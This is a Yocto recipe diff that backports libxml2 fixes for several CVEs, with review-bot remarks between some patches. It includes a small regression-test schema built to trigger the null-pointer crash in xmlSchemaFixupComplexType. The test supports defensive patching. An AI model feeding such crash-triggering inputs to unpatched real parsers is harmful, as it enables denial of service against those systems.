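+From e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:46:35 +0200
+Subject: [PATCH] [CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType
+
+Fix a null pointer dereference when parsing (invalid) XML schemas.
+
+Thanks to Robby Simpson for the report!
+
+Fixes #491.
+
+CVE: CVE-2023-28484
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ result/schemas/issue491_0_0.err | 1 +
+ test/schemas/issue491_0.xml | 1 +
+ test/schemas/issue491_0.xsd | 18 ++++++++++++++++++
+ xmlschemas.c | 2 +-
+ 4 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 result/schemas/issue491_0_0.err
+ create mode 100644 test/schemas/issue491_0.xml
+ create mode 100644 test/schemas/issue491_0.xsd
+
+diff --git a/result/schemas/issue491_0_0.err b/result/schemas/issue491_0_0.err
+new file mode 100644
+index 00000000..9b2bb969
+--- /dev/null
++++ b/result/schemas/issue491_0_0.err
+@@ -0,0 +1 @@
++./test/schemas/issue491_0.xsd:8: element complexType: Schemas parser error : complex type 'ChildType': The content type of both, the type and its base type, must either 'mixed' or 'element-only'.
+diff --git a/test/schemas/issue491_0.xml b/test/schemas/issue491_0.xml
+new file mode 100644
+index 00000000..e2b2fc2e
+--- /dev/null
++++ b/test/schemas/issue491_0.xml
+@@ -0,0 +1 @@
++<Child xmlns="http://www.test.com">5</Child>
+diff --git a/test/schemas/issue491_0.xsd b/test/schemas/issue491_0.xsd
+new file mode 100644
+index 00000000..81702649
+--- /dev/null
++++ b/test/schemas/issue491_0.xsd
+@@ -0,0 +1,18 @@
++<?xml version='1.0' encoding='UTF-8'?>
++<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns="http://www.test.com" targetNamespace="http://www.test.com" elementFormDefault="qualified" attributeFormDefault="unqualified">
++ <xs:complexType name="BaseType">
++ <xs:simpleContent>
++ <xs:extension base="xs:int" />
++ </xs:simpleContent>
++ </xs:complexType>
++ <xs:complexType name="ChildType">
++ <xs:complexContent>
++ <xs:extension base="BaseType">
++ <xs:sequence>
++ <xs:element name="bad" type="xs:int" minOccurs="0" maxOccurs="1"/>
++ </xs:sequence>
++ </xs:extension>
++ </xs:complexContent>
++ </xs:complexType>
++ <xs:element name="Child" type="ChildType" />
++</xs:schema>
+diff --git a/xmlschemas.c b/xmlschemas.c
+index 6a353858..a4eaf591 100644
+--- a/xmlschemas.c
++++ b/xmlschemas.c
+@@ -18632,7 +18632,7 @@ xmlSchemaFixupComplexType(xmlSchemaParserCtxtPtr pctxt,
+ "allowed to appear inside other model groups",
+ NULL, NULL);
+
+- } else if (! dummySequence) {
++ } else if ((!dummySequence) && (baseType->subtypes != NULL)) {
+ xmlSchemaTreeItemPtr effectiveContent =
+ (xmlSchemaTreeItemPtr) type->subtypes;
+ /*
+--
+GitLab
+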
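--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
@@ -0,0 +1,42 @@
+From 547edbf1cbdccd46b2e8ff322a456eaa5931c5df Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:49:27 +0200
+Subject: [PATCH] [CVE-2023-29469] Hashing of empty dict strings isn't
+ deterministic
+
+When hashing empty strings which aren't null-terminated,
+xmlDictComputeFastKey could produce inconsistent results. This could
+lead to various logic or memory errors, including double frees.
+
+For consistency the seed is also taken into account, but this shouldn't
+have an impact on security.
+
+Found by OSS-Fuzz.
+
+Fixes #510.
+
+CVE: CVE-2023-29469
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/547edbf1cbdccd46b2e8ff322a456eaa5931c5df]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ dict.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/dict.c b/dict.c
+index 86c3f6d7..d7fd1a06 100644
+--- a/dict.c
++++ b/dict.c
+@@ -451,7 +451,8 @@ static unsigned long
+ xmlDictComputeFastKey(const xmlChar *name, int namelen, int seed) {
+ unsigned long value = seed;
+
+- if (name == NULL) return(0);
++ if ((name == NULL) || (namelen <= 0))
++ return(value);
+ value = *name;
+ value <<= 5;
+ if (namelen > 10) {
+--
+GitLab
+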
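Review bot: In xmlDictComputeFastKey the context line `value = *name;` overwrites the `value = seed` initialisation, so after this change only the NULL or empty path returns a seeded value; unless code past the hunk mixes the seed back in, the key for every non-empty name still ignores the per-dict seed. The added `namelen <= 0` guard itself looks right for the non-deterministic empty-string case the description names. A backport should stay identical to upstream, so I would not alter the line here, but a comment such as `/* seed is not mixed in for non-empty names */` would make the limitation visible to anyone relying on hash randomisation. The function body continues past the hunk.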
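--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
@@ -0,0 +1,36 @@
+From d0c3f01e110d54415611c5fa0040cdf4a56053f9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 6 May 2023 17:47:37 +0200
+Subject: [PATCH] parser: Fix old SAX1 parser with custom callbacks
+
+For some reason, xmlCtxtUseOptionsInternal set the start and end element
+SAX handlers to the internal DOM builder functions when XML_PARSE_SAX1
+was specified. This means that custom SAX handlers could never work with
+that flag because these functions would receive the wrong user data
+argument and crash immediately.
+
+Fixes #535.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d0c3f01e110d54415611c5fa0040cdf4a56053f9]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 6e09208..7814e6e 100644
+--- a/parser.c
++++ b/parser.c
+@@ -15156,8 +15156,6 @@ xmlCtxtUseOptionsInternal(xmlParserCtxtPtr ctxt, int options, const char *encodi
+ }
+ #ifdef LIBXML_SAX1_ENABLED
+ if (options & XML_PARSE_SAX1) {
+- ctxt->sax->startElement = xmlSAX2StartElement;
+- ctxt->sax->endElement = xmlSAX2EndElement;
+ ctxt->sax->startElementNs = NULL;
+ ctxt->sax->endElementNs = NULL;
+ ctxt->sax->initialized = 1;
+--
+2.24.4
+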
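--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
@@ -0,0 +1,71 @@
+From 235b15a590eecf97b09e87bdb7e4f8333e9de129 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 8 May 2023 17:58:02 +0200
+Subject: [PATCH] SAX: Always initialize SAX1 element handlers
+
+Follow-up to commit d0c3f01e. A parser context will be initialized to
+SAX version 2, but this can be overridden with XML_PARSE_SAX1 later,
+so we must initialize the SAX1 element handlers as well.
+
+Change the check in xmlDetectSAX2 to only look for XML_SAX2_MAGIC, so
+we don't switch to SAX1 if the SAX2 element handlers are NULL.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/235b15a590eecf97b09e87bdb7e4f8333e9de129]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ SAX2.c | 11 +++++++----
+ parser.c | 5 +----
+ 2 files changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/SAX2.c b/SAX2.c
+index 5f141f9..902d34d 100644
+--- a/SAX2.c
++++ b/SAX2.c
+@@ -2869,20 +2869,23 @@ xmlSAXVersion(xmlSAXHandler *hdlr, int version)
+ {
+ if (hdlr == NULL) return(-1);
+ if (version == 2) {
+- hdlr->startElement = NULL;
+- hdlr->endElement = NULL;
+ hdlr->startElementNs = xmlSAX2StartElementNs;
+ hdlr->endElementNs = xmlSAX2EndElementNs;
+ hdlr->serror = NULL;
+ hdlr->initialized = XML_SAX2_MAGIC;
+ #ifdef LIBXML_SAX1_ENABLED
+ } else if (version == 1) {
+- hdlr->startElement = xmlSAX2StartElement;
+- hdlr->endElement = xmlSAX2EndElement;
+ hdlr->initialized = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+ } else
+ return(-1);
++#ifdef LIBXML_SAX1_ENABLED
++ hdlr->startElement = xmlSAX2StartElement;
++ hdlr->endElement = xmlSAX2EndElement;
++#else
++ hdlr->startElement = NULL;
++ hdlr->endElement = NULL;
++#endif /* LIBXML_SAX1_ENABLED */
+ hdlr->internalSubset = xmlSAX2InternalSubset;
+ hdlr->externalSubset = xmlSAX2ExternalSubset;
+ hdlr->isStandalone = xmlSAX2IsStandalone;
+diff --git a/parser.c b/parser.c
+index 7814e6e..cf0fb38 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1102,10 +1102,7 @@ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
+ if (ctxt == NULL) return;
+ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
+- ((sax->startElementNs != NULL) ||
+- (sax->endElementNs != NULL) ||
+- ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC))
+ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+--
+2.24.4
+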
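Review bot: xmlDetectSAX2 now sets `ctxt->sax2 = 1` on `sax->initialized == XML_SAX2_MAGIC` alone, so a caller-supplied handler that sets the magic value but fills only `startElement`/`endElement` is no longer routed to SAX1 as the removed condition did. For a stable-branch backport that is a behaviour change for applications, presumably leaving their element callbacks uncalled, and the description mentions only the case where the SAX2 handlers are NULL. I would state the rule in a comment above the test, for example `/* XML_SAX2_MAGIC alone selects SAX2; SAX1-only handlers must not set it */`. The function continues past the hunk.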
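--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
@@ -0,0 +1,44 @@
+From 99fc048d7f7292c5ee18e44c400bd73bc63a47ed Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 14 Aug 2020 14:18:50 +0200
+Subject: [PATCH] Don't use SAX1 if all element handlers are NULL
+
+Running xmllint with "--sax --noout" installs a SAX2 handler with all
+callbacks set to NULL. In this case or similar situations, we don't want
+to switch to SAX1 parsing.
+
+Note: This patch is needed for "CVE-2023-39615-0002" patch to apply.
+Without this patch the build will fail with undefined sax error.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/99fc048d7f7292c5ee18e44c400bd73bc63a47ed]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index bb677b0..6e09208 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1098,11 +1098,15 @@ xmlHasFeature(xmlFeature feature)
+ */
+ static void
+ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
++ xmlSAXHandlerPtr sax;
+ if (ctxt == NULL) return;
++ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((ctxt->sax) && (ctxt->sax->initialized == XML_SAX2_MAGIC) &&
+- ((ctxt->sax->startElementNs != NULL) ||
+- (ctxt->sax->endElementNs != NULL))) ctxt->sax2 = 1;
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
++ ((sax->startElementNs != NULL) ||
++ (sax->endElementNs != NULL) ||
++ ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+--
+2.24.4
+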
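Review bot: The header of this prerequisite patch does not follow the form used by the other libxml2 patches added in this commit: it has `Upstream-Status: Backport from [...]` where they use `Upstream-Status: Backport [...]`, and it carries no `CVE:` line. Tooling that parses these tags may not recognise the `from` variant, so I would write `Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/99fc048d7f7292c5ee18e44c400bd73bc63a47ed]` and add `CVE: CVE-2023-39615 #Dependency Patch`, in the style of CVE-2024-25062-pre1.patch. That keeps the link between this change and the CVE it supports visible in the patch itself rather than only in the file name.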
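--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
@@ -0,0 +1,50 @@
+From a22bd982bf10291deea8ba0c61bf75b898c604ce Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 2 Nov 2022 15:44:42 +0100
+Subject: [PATCH] malloc-fail: Fix memory leak in xmlStaticCopyNodeList
+
+Found with libFuzzer, see #344.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/a22bd982bf10291deea8ba0c61bf75b898c604ce]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 507869efe..647288ce3 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4461,7 +4461,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ if (doc->intSubset == NULL) {
+ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ q->doc = doc;
+ q->parent = parent;
+ doc->intSubset = (xmlDtdPtr) q;
+@@ -4473,7 +4473,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ } else
+ #endif /* LIBXML_TREE_ENABLED */
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4486,6 +4486,9 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ node = node->next;
+ }
+ return(ret);
++error:
++ xmlFreeNodeList(ret);
++ return(NULL);
+ }
+
+ /**
+--
+GitLab
+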
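Review bot: The new `error:` path calls `xmlFreeNodeList(ret)` while the first hunk has already set `doc->intSubset = (xmlDtdPtr) q`, and `q` appears to be linked into that same list, so an allocation failure on a later node may leave `doc->intSubset` pointing at freed memory. This patch should therefore never be carried without CVE-2023-45322-2.patch, whose description lists "Fix UAF if malloc fails". I would say so in the header, the way CVE-2023-39615-pre.patch documents its follow-up, and add `CVE: CVE-2023-45322 #Dependency Patch` since the header has no `CVE:` line at all. xmlStaticCopyNodeList starts outside the hunks shown.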
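--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
@@ -0,0 +1,80 @@
+From d39f78069dff496ec865c73aa44d7110e429bce9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 23 Aug 2023 20:24:24 +0200
+Subject: [PATCH] tree: Fix copying of DTDs
+
+- Don't create multiple DTD nodes.
+- Fix UAF if malloc fails.
+- Skip DTD nodes if tree module is disabled.
+
+Fixes #583.
+
+CVE: CVE-2023-45322
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d39f78069dff496ec865c73aa44d7110e429bce9]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 6c8a875b9..02c1b5791 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4471,29 +4471,28 @@ xmlNodePtr
+ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ xmlNodePtr ret = NULL;
+ xmlNodePtr p = NULL,q;
++ xmlDtdPtr newSubset = NULL;
+
+ while (node != NULL) {
+-#ifdef LIBXML_TREE_ENABLED
+ if (node->type == XML_DTD_NODE ) {
+- if (doc == NULL) {
++#ifdef LIBXML_TREE_ENABLED
++ if ((doc == NULL) || (doc->intSubset != NULL)) {
+ node = node->next;
+ continue;
+ }
+- if (doc->intSubset == NULL) {
+- q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) goto error;
+- q->doc = doc;
+- q->parent = parent;
+- doc->intSubset = (xmlDtdPtr) q;
+- xmlAddChild(parent, q);
+- } else {
+- q = (xmlNodePtr) doc->intSubset;
+- xmlAddChild(parent, q);
+- }
+- } else
++ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
++ if (q == NULL) goto error;
++ q->doc = doc;
++ q->parent = parent;
++ newSubset = (xmlDtdPtr) q;
++#else
++ node = node->next;
++ continue;
+ #endif /* LIBXML_TREE_ENABLED */
++ } else {
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) goto error;
++ if (q == NULL) goto error;
++ }
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4505,6 +4504,8 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ node = node->next;
+ }
++ if (newSubset != NULL)
++ doc->intSubset = newSubset;
+ return(ret);
+ error:
+ xmlFreeNodeList(ret);
+--
+GitLab
+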
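--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
@@ -0,0 +1,38 @@
+From 31c6ce3b63f8a494ad9e31ca65187a73d8ad3508 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 9 Nov 2020 17:55:44 +0100
+Subject: [PATCH] Avoid call stack overflow with XML reader and recursive
+ XIncludes
+
+Don't process XIncludes in the result of another inclusion to avoid
+infinite recursion resulting in a call stack overflow.
+
+This is something the XInclude engine shouldn't allow but correct
+handling of intra-document includes would require major changes.
+
+Found by OSS-Fuzz.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/31c6ce3b63f8a494ad9e31ca65187a73d8ad3508]
+CVE: CVE-2024-25062 #Dependency Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 01adf74f4..72e40b032 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1585,7 +1585,8 @@ node_found:
+ /*
+ * Handle XInclude if asked for
+ */
+- if ((reader->xinclude) && (reader->node != NULL) &&
++ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+ ((xmlStrEqual(reader->node->ns->href, XINCLUDE_NS)) ||
+--
+GitLab
+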
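--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
@@ -0,0 +1,33 @@
+From 2b0aac140d739905c7848a42efc60bfe783a39b7 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 14 Oct 2023 22:45:54 +0200
+Subject: [PATCH] [CVE-2024-25062] xmlreader: Don't expand XIncludes when
+ backtracking
+
+Fixes a use-after-free if XML Reader if used with DTD validation and
+XInclude expansion.
+
+Fixes #604.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2b0aac140d739905c7848a42efc60bfe783a39b7]
+CVE: CVE-2024-25062
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 979385a13..fefd68e0b 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1443,6 +1443,7 @@ node_found:
+ * Handle XInclude if asked for
+ */
+ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->state != XML_TEXTREADER_BACKTRACK) &&
+ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+--
+GitLab
+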
diff --git a/meta/recipes-core/libxml/libxml2/runtest.patch b/meta/recipes-core/libxml/libxml2/runtest.patch
index 0dbb353c0f..c7a90cd3dc 100644
--- a/meta/recipes-core/libxml/libxml2/runtest.patch
+++ b/meta/recipes-core/libxml/libxml2/runtest.patch
@@ -1,28 +1,33 @@
1Add 'install-ptest' rule. Print a standard result line for 1From 6172ccd1e74bc181f5298f19e240234e12876abe Mon Sep 17 00:00:00 2001
2each test. 2From: Tony Tascioglu <tony.tascioglu@windriver.com>
3Date: Tue, 11 May 2021 11:57:46 -0400
4Subject: [PATCH] Add 'install-ptest' rule.
5
6Print a standard result line for each test.
3 7
4Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com> 8Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com>
5Signed-off-by: Andrej Valek <andrej.valek@siemens.com> 9Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
6Upstream-Status: Backport 10Upstream-Status: Pending
7 11
8Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> 12Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
13Signed-off-by: Tony Tascioglu <tony.tascioglu@windriver.com>
9--- 14---
10 Makefile.am | 9 ++++ 15 Makefile.am | 9 +++
11 runsuite.c | 1 + 16 runsuite.c | 1 +
12 runtest.c | 2 + 17 runtest.c | 2 +
13 runxmlconf.c | 1 + 18 runxmlconf.c | 1 +
14 testapi.c | 122 ++++++++++++++++++++++++++++++--------------- 19 testapi.c | 122 ++++++++++++++++++++++++++-------------
15 testchar.c | 156 +++++++++++++++++++++++++++++++++++++++++----------------- 20 testchar.c | 156 +++++++++++++++++++++++++++++++++++---------------
16 testdict.c | 1 + 21 testdict.c | 1 +
17 testlimits.c | 1 + 22 testlimits.c | 1 +
18 testrecurse.c | 2 + 23 testrecurse.c | 2 +
19 9 files changed, 210 insertions(+), 85 deletions(-) 24 9 files changed, 210 insertions(+), 85 deletions(-)
20 25
21diff --git a/Makefile.am b/Makefile.am 26diff --git a/Makefile.am b/Makefile.am
22index 9c630be..7cfd04b 100644 27index 05d1671f..ae622745 100644
23--- a/Makefile.am 28--- a/Makefile.am
24+++ b/Makefile.am 29+++ b/Makefile.am
25@@ -202,6 +202,15 @@ runxmlconf_LDADD= $(LDADDS) 30@@ -198,6 +198,15 @@ runxmlconf_LDADD= $(LDADDS)
26 #testOOM_DEPENDENCIES = $(DEPS) 31 #testOOM_DEPENDENCIES = $(DEPS)
27 #testOOM_LDADD= $(LDADDS) 32 #testOOM_LDADD= $(LDADDS)
28 33
@@ -39,10 +44,10 @@ index 9c630be..7cfd04b 100644
39 testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT) 44 testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT)
40 [ -d test ] || $(LN_S) $(srcdir)/test . 45 [ -d test ] || $(LN_S) $(srcdir)/test .
41diff --git a/runsuite.c b/runsuite.c 46diff --git a/runsuite.c b/runsuite.c
42index aaab13e..9ba2c5d 100644 47index d24b5ec3..f7ff2521 100644
43--- a/runsuite.c 48--- a/runsuite.c
44+++ b/runsuite.c 49+++ b/runsuite.c
45@@ -1162,6 +1162,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 50@@ -1147,6 +1147,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
46 51
47 if (logfile != NULL) 52 if (logfile != NULL)
48 fclose(logfile); 53 fclose(logfile);
@@ -51,10 +56,10 @@ index aaab13e..9ba2c5d 100644
51 } 56 }
52 #else /* !SCHEMAS */ 57 #else /* !SCHEMAS */
53diff --git a/runtest.c b/runtest.c 58diff --git a/runtest.c b/runtest.c
54index addda5c..8ba5d59 100644 59index ffa98d04..470f95cb 100644
55--- a/runtest.c 60--- a/runtest.c
56+++ b/runtest.c 61+++ b/runtest.c
57@@ -4501,6 +4501,7 @@ launchTests(testDescPtr tst) { 62@@ -4508,6 +4508,7 @@ launchTests(testDescPtr tst) {
58 xmlCharEncCloseFunc(ebcdicHandler); 63 xmlCharEncCloseFunc(ebcdicHandler);
59 xmlCharEncCloseFunc(eucJpHandler); 64 xmlCharEncCloseFunc(eucJpHandler);
60 65
@@ -62,7 +67,7 @@ index addda5c..8ba5d59 100644
62 return(err); 67 return(err);
63 } 68 }
64 69
65@@ -4577,6 +4578,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 70@@ -4588,6 +4589,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
66 xmlCleanupParser(); 71 xmlCleanupParser();
67 xmlMemoryDump(); 72 xmlMemoryDump();
68 73
@@ -71,7 +76,7 @@ index addda5c..8ba5d59 100644
71 } 76 }
72 77
73diff --git a/runxmlconf.c b/runxmlconf.c 78diff --git a/runxmlconf.c b/runxmlconf.c
74index cef20f4..4f291fb 100644 79index 70f61017..e882b3a1 100644
75--- a/runxmlconf.c 80--- a/runxmlconf.c
76+++ b/runxmlconf.c 81+++ b/runxmlconf.c
77@@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 82@@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -83,7 +88,7 @@ index cef20f4..4f291fb 100644
83 } 88 }
84 89
85diff --git a/testapi.c b/testapi.c 90diff --git a/testapi.c b/testapi.c
86index 4a751e2..7ccc066 100644 91index ff8b470d..52b51d78 100644
87--- a/testapi.c 92--- a/testapi.c
88+++ b/testapi.c 93+++ b/testapi.c
89@@ -1246,49 +1246,91 @@ static int 94@@ -1246,49 +1246,91 @@ static int
@@ -219,7 +224,7 @@ index 4a751e2..7ccc066 100644
219 } 224 }
220 225
221diff --git a/testchar.c b/testchar.c 226diff --git a/testchar.c b/testchar.c
222index 0d08792..f555d3b 100644 227index 6866a175..7bce0132 100644
223--- a/testchar.c 228--- a/testchar.c
224+++ b/testchar.c 229+++ b/testchar.c
225@@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) { 230@@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) {
@@ -797,7 +802,7 @@ index 0d08792..f555d3b 100644
797 /* 802 /*
798 * Cleanup function for the XML library. 803 * Cleanup function for the XML library.
799diff --git a/testdict.c b/testdict.c 804diff --git a/testdict.c b/testdict.c
800index 40bebd0..114b934 100644 805index 40bebd05..114b9347 100644
801--- a/testdict.c 806--- a/testdict.c
802+++ b/testdict.c 807+++ b/testdict.c
803@@ -440,5 +440,6 @@ int main(void) 808@@ -440,5 +440,6 @@ int main(void)
@@ -808,7 +813,7 @@ index 40bebd0..114b934 100644
808 return(ret); 813 return(ret);
809 } 814 }
810diff --git a/testlimits.c b/testlimits.c 815diff --git a/testlimits.c b/testlimits.c
811index 68c94db..1584434 100644 816index 059116a6..f0bee68d 100644
812--- a/testlimits.c 817--- a/testlimits.c
813+++ b/testlimits.c 818+++ b/testlimits.c
814@@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) { 819@@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -819,7 +824,7 @@ index 68c94db..1584434 100644
819 return(ret); 824 return(ret);
820 } 825 }
821diff --git a/testrecurse.c b/testrecurse.c 826diff --git a/testrecurse.c b/testrecurse.c
822index f95ae1c..74c8f8b 100644 827index 0cbe25a6..3ecadb40 100644
823--- a/testrecurse.c 828--- a/testrecurse.c
824+++ b/testrecurse.c 829+++ b/testrecurse.c
825@@ -892,6 +892,7 @@ launchTests(testDescPtr tst) { 830@@ -892,6 +892,7 @@ launchTests(testDescPtr tst) {
@@ -838,5 +843,5 @@ index f95ae1c..74c8f8b 100644
838 return(ret); 843 return(ret);
839 } 844 }
840-- 845--
8412.7.4 8462.25.1
842 847
diff --git a/meta/recipes-core/libxml/libxml2_2.9.10.bb b/meta/recipes-core/libxml/libxml2_2.9.10.bb
index 4ebfb9e556..72f830b6d3 100644
--- a/meta/recipes-core/libxml/libxml2_2.9.10.bb
+++ b/meta/recipes-core/libxml/libxml2_2.9.10.bb
@@ -1,6 +1,6 @@
1SUMMARY = "XML C Parser Library and Toolkit" 1SUMMARY = "XML C Parser Library and Toolkit"
2DESCRIPTION = "The XML Parser Library allows for manipulation of XML files. Libxml2 exports Push and Pull type parser interfaces for both XML and HTML. It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD. Libxml2 includes complete XPath, XPointer and Xinclude implementations. It also has a SAX like interface, which is designed to be compatible with Expat." 2DESCRIPTION = "The XML Parser Library allows for manipulation of XML files. Libxml2 exports Push and Pull type parser interfaces for both XML and HTML. It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD. Libxml2 includes complete XPath, XPointer and Xinclude implementations. It also has a SAX like interface, which is designed to be compatible with Expat."
3HOMEPAGE = "http://www.xmlsoft.org/" 3HOMEPAGE = "https://gitlab.gnome.org/GNOME/libxml2"
